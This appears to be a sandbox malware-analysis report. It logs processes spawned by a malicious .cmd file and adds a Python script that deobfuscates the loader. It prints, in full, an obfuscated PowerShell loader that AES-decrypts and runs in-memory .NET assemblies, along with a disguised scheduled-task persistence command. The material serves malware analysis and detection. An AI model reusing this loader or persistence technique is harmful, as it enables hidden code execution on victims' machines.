                                    Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\mhk.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create();$iYroy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iYroy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iYroy.Key=[System.Convert]::($Rtyv[8])('SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=');$iYroy.IV=[System.Convert]::($Rtyv[8])('5qReXrx1Mz3EZX5V7wyNKQ==');$VcojP=$iYroy.($Rtyv[2])();$VYqzB=$VcojP.($Rtyv[3])($ePEhV,0,$ePEhV.Length);$VcojP.Dispose();$iYroy.Dispose();$VYqzB;}function uMMXI($ePEhV){$vtWcn=New-Object System.IO.MemoryStream(,$ePEhV);$wwnvp=New-Object System.IO.MemoryStream;$Guujf=New-Object System.IO.Compression.GZipStream($vtWcn,[IO.Compression.CompressionMode]::($Rtyv[11]));$Guujf.($Rtyv[10])($wwnvp);$Guujf.Dispose();$vtWcn.Dispose();$wwnvp.Dispose();$wwnvp.ToArray();}$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 5).Substring(2))));$SgTUK=uMMXI (tNioj 
([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null); "
                                    Imagebase:0x7ff6d25d0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true
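The cmd.exe command line of Target ID 5 above is the complete first-stage loader. Every .NET member it calls is rebuilt from a junk-padded string with .Replace() and then invoked by index through $Rtyv, so the words Load, EntryPoint and Invoke never appear literally and a keyword match on the command line misses them. The Python below is an added example, not part of the Joe Sandbox report: it evaluates the fourteen Replace() calls, rewrites the loader's tail with the resolved names, and mirrors the tNioj/uMMXI pipeline (Substring(2), FromBase64String, AES-256-CBC with the key and IV from the script, PKCS7 unpadding, GZip) that turns two lines of the .cmd file into in-memory assemblies. The $Rtyv strings, the key and the IV are copied from the command line; the recover_assembly helper assumes the cryptography package and a copy of the dropped .cmd file, whose payload lines the report does not reproduce, so it is defined but not exercised here.

```python
"""Resolve the loader's string-rebuilding obfuscation and mirror its payload
pipeline.  Added example; not code from the sandbox report or the malware."""
import base64
import gzip
import re

# The $Rtyv assignment, copied from the cmd.exe command line of Target ID 5.
RTYV_ASSIGNMENT = (
    "$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),"
    "'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),"
    "'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),"
    "'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),"
    "'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),"
    "'LoalBOkdlBOk'.Replace('lBOk', ''),"
    "'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),"
    "'Shhcaplihhcathhca'.Replace('hhca', ''),"
    "'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),"
    "'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),"
    "'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),"
    "'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),"
    "'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),"
    "'Inpsjavopsjakpsjaepsja'.Replace('psja', '');"
)

# The tail of the loader, also copied from the command line: this is where
# the array entries are used as method names.
LOADER_TAIL = (
    "$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);"
    "$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 5).Substring(2))));"
    "$SgTUK=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));"
    "[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);"
    "[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null);"
)

# AES-256 key and IV exactly as base64 in the loader's tNioj function.
AES_KEY = base64.b64decode("SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=")
AES_IV = base64.b64decode("5qReXrx1Mz3EZX5V7wyNKQ==")

REPLACE_CALL = re.compile(r"'([^']*)'\.Replace\('([^']*)',\s*''\)")
INDEXED_MEMBER = re.compile(r"\(\$Rtyv\[(\d+)\]\)")


def resolve_rtyv(assignment):
    """Evaluate each 'junked'.Replace('junk', '') and return the clean names in order."""
    return [padded.replace(junk, "") for padded, junk in REPLACE_CALL.findall(assignment)]


def deobfuscate(script, names):
    """Swap every ($Rtyv[n]) for the member name it resolves to."""
    return INDEXED_MEMBER.sub(lambda m: names[int(m.group(1))], script)


def recover_assembly(cmd_text, line_index):
    """Mirror of uMMXI(tNioj(FromBase64String(ElementAt(ReadLines(path), n).Substring(2)))).

    cmd_text is the content of the .cmd file the loader opens via
    [Console]::Title (the loader uses n = 5 and n = 6, zero-based).
    Assumption: the 'cryptography' package is installed; it is imported here
    so the rest of the script runs without it.
    """
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    line = cmd_text.splitlines()[line_index]      # ElementAt(lines, n)
    blob = base64.b64decode(line[2:])             # .Substring(2), FromBase64String
    dec = Cipher(algorithms.AES(AES_KEY), modes.CBC(AES_IV)).decryptor()
    padded = dec.update(blob) + dec.finalize()    # CBC mode, as tNioj sets it
    unpad = padding.PKCS7(128).unpadder()         # PaddingMode PKCS7
    gz = unpad.update(padded) + unpad.finalize()
    return gzip.decompress(gz)                    # uMMXI: GZipStream Decompress


if __name__ == "__main__":
    names = resolve_rtyv(RTYV_ASSIGNMENT)
    for i, name in enumerate(names):
        print(f"$Rtyv[{i:2}] = {name}")
    print(deobfuscate(LOADER_TAIL, names))
```

With the names resolved the tail reads ReadLines([Console]::Title), ElementAt(lines, 5) and ElementAt(lines, 6) with the first two characters dropped, FromBase64String, AES decrypt, Decompress, then [System.Reflection.Assembly]::Load(...).EntryPoint.Invoke($null,$null) twice: the loader reads the .cmd file it was launched from, whose path it stored in the window title, and the decrypted assemblies never touch disk. Entries 4, 7, 9 and 12 (GetCurrentProcess, Split, MainModule, ChangeExtension) are built but not referenced in the visible command line.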

                                    Target ID:6
                                    Start time:03:19:02
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:03:19:04
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:8
                                    Start time:03:19:11
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\mhk')
                                    Imagebase:0xcc0000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:9
                                    Start time:03:19:11
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:13
                                    Start time:03:19:26
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:14
                                    Start time:03:19:26
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:15
                                    Start time:03:19:30
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\user\AppData\Roaming\Network64476Man.cmd"
                                    Imagebase:0x7ff6d25d0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:16
                                    Start time:03:19:30
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:17
                                    Start time:03:19:43
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Network64476Man.cmd"
                                    Imagebase:0x7ff6d25d0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:18
                                    Start time:03:19:43
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:19
                                    Start time:03:19:43
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Network64476Man.cmd"
                                    Imagebase:0x7ff6d25d0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:20
                                    Start time:03:19:44
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:21
                                    Start time:03:19:44
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network64476Man.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create();$iYroy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iYroy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iYroy.Key=[System.Convert]::($Rtyv[8])('SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=');$iYroy.IV=[System.Convert]::($Rtyv[8])('5qReXrx1Mz3EZX5V7wyNKQ==');$VcojP=$iYroy.($Rtyv[2])();$VYqzB=$VcojP.($Rtyv[3])($ePEhV,0,$ePEhV.Length);$VcojP.Dispose();$iYroy.Dispose();$VYqzB;}function uMMXI($ePEhV){$vtWcn=New-Object System.IO.MemoryStream(,$ePEhV);$wwnvp=New-Object System.IO.MemoryStream;$Guujf=New-Object System.IO.Compression.GZipStream($vtWcn,[IO.Compression.CompressionMode]::($Rtyv[11]));$Guujf.($Rtyv[10])($wwnvp);$Guujf.Dispose();$vtWcn.Dispose();$wwnvp.Dispose();$wwnvp.ToArray();}$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 5).Substring(2))));$SgTUK=uMMXI (tNioj 
([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null); "
                                    Imagebase:0x7ff6d25d0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:22
                                    Start time:03:19:44
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:23
                                    Start time:03:19:45
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:24
                                    Start time:03:19:59
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network64476Man')
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:25
                                    Start time:03:19:59
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:27
                                    Start time:03:20:30
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:28
                                    Start time:03:20:30
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                      Execution Graph

                                      Execution Coverage:11.5%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:28%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:23
API calls 26005->26072 26007 7ff65a379948 31 API calls 26007->26072 26017 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26008->26017 26009 7ff65a363cf4 51 API calls 26009->26072 26662 7ff65a35704c 47 API calls BuildCatchObjectHelperInternal 26010->26662 26018 7ff65a37e926 26011->26018 26012->26002 26019 7ff65a37d588 IsDlgButtonChecked 26013->26019 26016->25980 26021 7ff65a37eeb6 26017->26021 26652 7ff65a36d1e8 26018->26652 26019->26072 26020->26016 26025 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26021->26025 26024 7ff65a365b20 53 API calls 26024->26072 26027 7ff65a37eebc 26025->26027 26026 7ff65a37d5bc IsDlgButtonChecked 26026->26072 26033 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26027->26033 26028->25996 26028->25998 26036 7ff65a37eed4 26028->26036 26038 7ff65a37eeda 26028->26038 26030 7ff65a365a68 33 API calls 26030->26072 26037 7ff65a37eec2 26033->26037 26035 7ff65a35129c 33 API calls 26064 7ff65a37e951 26035->26064 26039 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26036->26039 26044 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26037->26044 26043 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26038->26043 26039->26038 26040 7ff65a358d04 33 API calls 26040->26072 26041 7ff65a371344 CompareStringW 26041->26064 26042 7ff65a351744 33 API calls 26042->26072 26043->26010 26046 7ff65a37eec8 26044->26046 26045 7ff65a363268 51 API calls 26045->26072 26049 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26046->26049 26047 7ff65a3657e0 33 API calls 26047->26072 26048 7ff65a35e174 33 API calls 26048->26072 26051 7ff65a37eece 26049->26051 26050 7ff65a35250c SetDlgItemTextW 26050->26072 26055 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26051->26055 26053 7ff65a351150 33 API calls 26053->26072 26055->26036 26057 7ff65a351fa0 31 API calls 26057->26064 26059 7ff65a351fa0 31 API calls 26059->26072 26060 7ff65a37df19 EndDialog 26060->26072 26062 
7ff65a36327c 51 API calls 26062->26072 26063 7ff65a36d1e8 33 API calls 26063->26064 26064->26028 26064->26035 26064->26041 26064->26046 26064->26051 26064->26057 26064->26063 26065 7ff65a37daa1 MoveFileW 26066 7ff65a37dad5 MoveFileExW 26065->26066 26067 7ff65a37daf0 26065->26067 26066->26067 26068 7ff65a351fa0 31 API calls 26067->26068 26067->26072 26068->26067 26069 7ff65a3520b0 33 API calls 26069->26072 26070 7ff65a362f18 56 API calls 26070->26072 26072->25925 26072->25928 26072->25931 26072->25934 26072->25935 26072->25937 26072->25939 26072->25941 26072->25944 26072->25947 26072->25948 26072->25953 26072->25956 26072->25957 26072->25963 26072->25966 26072->25967 26072->25969 26072->25972 26072->25976 26072->25977 26072->25982 26072->25984 26072->25988 26072->25999 26072->26005 26072->26007 26072->26008 26072->26009 26072->26021 26072->26024 26072->26026 26072->26027 26072->26030 26072->26037 26072->26040 26072->26042 26072->26045 26072->26047 26072->26048 26072->26050 26072->26053 26072->26059 26072->26060 26072->26062 26072->26065 26072->26069 26072->26070 26569 7ff65a371344 CompareStringW 26072->26569 26608 7ff65a36cf60 35 API calls _invalid_parameter_noinfo_noreturn 26072->26608 26609 7ff65a379534 33 API calls Concurrency::cancel_current_task 26072->26609 26610 7ff65a380604 31 API calls _invalid_parameter_noinfo_noreturn 26072->26610 26611 7ff65a35df5c 47 API calls BuildCatchObjectHelperInternal 26072->26611 26612 7ff65a37a7b4 33 API calls _invalid_parameter_noinfo_noreturn 26072->26612 26613 7ff65a379498 33 API calls 26072->26613 26614 7ff65a37a3c0 116 API calls 2 library calls 26072->26614 26615 7ff65a37ab68 33 API calls 3 library calls 26072->26615 26616 7ff65a367328 33 API calls 2 library calls 26072->26616 26617 7ff65a364048 33 API calls 26072->26617 26618 7ff65a366570 33 API calls 3 library calls 26072->26618 26619 7ff65a36728c 26072->26619 26623 7ff65a36317c 26072->26623 26637 7ff65a363e60 FindClose 26072->26637 26638 7ff65a371374 CompareStringW 
26072->26638 26639 7ff65a379c50 47 API calls 26072->26639 26640 7ff65a378758 51 API calls 3 library calls 26072->26640 26641 7ff65a37aad4 33 API calls _handle_error 26072->26641 26642 7ff65a367db4 26072->26642 26650 7ff65a365ac8 CompareStringW 26072->26650 26651 7ff65a367e70 47 API calls 26072->26651 26074 7ff65a37f923 26073->26074 26075 7ff65a3520b0 33 API calls 26074->26075 26076 7ff65a37f939 26075->26076 26077 7ff65a3520b0 33 API calls 26076->26077 26078 7ff65a37f96e 26076->26078 26077->26078 26676 7ff65a35e35c 26078->26676 26080 7ff65a37f9cb 26696 7ff65a35e7b8 26080->26696 26082 7ff65a37f9d6 26083 7ff65a3822a0 _handle_error 8 API calls 26082->26083 26084 7ff65a37bbd2 26083->26084 26084->25707 27793 7ff65a37841c 26086->27793 26089 7ff65a37f437 26091 7ff65a3822a0 _handle_error 8 API calls 26089->26091 26090 7ff65a37f347 GetWindow 26095 7ff65a37f362 26090->26095 26092 7ff65a37be1b 26091->26092 26092->25467 26092->25468 26093 7ff65a37f36e GetClassNameW 27798 7ff65a371344 CompareStringW 26093->27798 26095->26089 26095->26093 26096 7ff65a37f397 GetWindowLongPtrW 26095->26096 26097 7ff65a37f416 GetWindow 26095->26097 26096->26097 26098 7ff65a37f3a9 IsDlgButtonChecked 26096->26098 26097->26089 26097->26095 26098->26097 26099 7ff65a37f3c5 GetObjectW 26098->26099 27799 7ff65a378484 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26099->27799 26101 7ff65a37f3e1 27800 7ff65a37844c 26101->27800 27804 7ff65a378d74 16 API calls _handle_error 26101->27804 26104 7ff65a37f3f9 IsDlgButtonChecked DeleteObject 26104->26097 26106 7ff65a36634d 26105->26106 26107 7ff65a3662c0 26105->26107 26106->25482 26108 7ff65a3513a4 33 API calls 26107->26108 26109 7ff65a3662db GetCurrentDirectoryW 26108->26109 26110 7ff65a366301 26109->26110 26111 7ff65a3520b0 33 API calls 26110->26111 26112 7ff65a36630f 26111->26112 26112->26106 26113 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26112->26113 26114 7ff65a366369 26113->26114 26116 7ff65a35252a SetDlgItemTextW 26115->26116 26117 
7ff65a352527 26115->26117 26118 7ff65a3be2e0 26116->26118 26117->26116 26119->25493 26121 7ff65a352516 SetDlgItemTextW 26120->26121 26122 7ff65a352513 26120->26122 26122->26121 26125 7ff65a3512d0 26123->26125 26130 7ff65a35139b 26123->26130 26127 7ff65a351396 26125->26127 26128 7ff65a351338 26125->26128 26131 7ff65a3512de BuildCatchObjectHelperInternal 26125->26131 27807 7ff65a351f80 33 API calls 3 library calls 26127->27807 26128->26131 26132 7ff65a382150 33 API calls 26128->26132 27808 7ff65a352004 33 API calls std::_Xinvalid_argument 26130->27808 26131->25528 26132->26131 26133->25561 26135 7ff65a36327c 51 API calls 26134->26135 26136 7ff65a363271 26135->26136 26136->25571 26136->25594 26137->25571 26139 7ff65a3513a4 33 API calls 26138->26139 26140 7ff65a366449 26139->26140 26141 7ff65a36644c GetModuleFileNameW 26140->26141 26144 7ff65a36649c 26140->26144 26142 7ff65a366467 26141->26142 26143 7ff65a36649e 26141->26143 26142->26140 26143->26144 26145 7ff65a35129c 33 API calls 26144->26145 26147 7ff65a3664c6 26145->26147 26146 7ff65a3664fe 26146->25637 26147->26146 26148 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26147->26148 26149 7ff65a366520 26148->26149 26150->25652 26152 7ff65a3520f6 26151->26152 26154 7ff65a3520cb BuildCatchObjectHelperInternal 26151->26154 27809 